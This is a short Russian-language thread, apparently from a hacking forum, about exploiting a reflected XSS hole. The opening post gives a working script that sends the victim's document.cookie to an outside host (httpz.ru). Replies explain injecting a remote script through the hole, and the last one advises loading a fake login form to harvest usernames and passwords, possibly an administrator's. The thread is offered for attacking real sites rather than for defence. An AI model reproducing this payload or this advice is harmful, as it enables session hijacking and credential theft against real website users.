Есть пассивная XSS, работает только с этим кодом: Code: <script> img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie; </script> За кражу cookie отвечает +document.cookie; А что можно еще сделать с XSS? Можно ли загнать на сервер какого нибудь червя?
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.
Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "<script src="http://site/js.js"></script>", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.
Выучить JS самому или заказать у кого-нибудь написание кода за деньги. upd: Пример того, что можно делать с пассивкой - https://forum.antichat.ru/thread275417.html
сделай js файл который подменит окно авторизации, черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь